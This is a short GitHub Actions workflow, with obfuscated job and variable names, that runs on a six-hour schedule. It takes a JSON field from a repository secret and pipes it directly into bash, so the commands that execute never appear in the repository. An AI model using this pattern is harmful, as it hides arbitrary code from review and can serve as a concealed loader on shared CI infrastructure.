name: houyongliang1972

on:
  workflow_dispatch:
  schedule:
    - cron: '22 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: houyongliang1972
        env:
          cji0569: ${{ secrets.cji0569 }}
        run: |
          echo $cji0569 | jq -r .ftpim8921 | /bin/bash
          echo $ya900 | jq -r .jzpk77 | /bin/bash

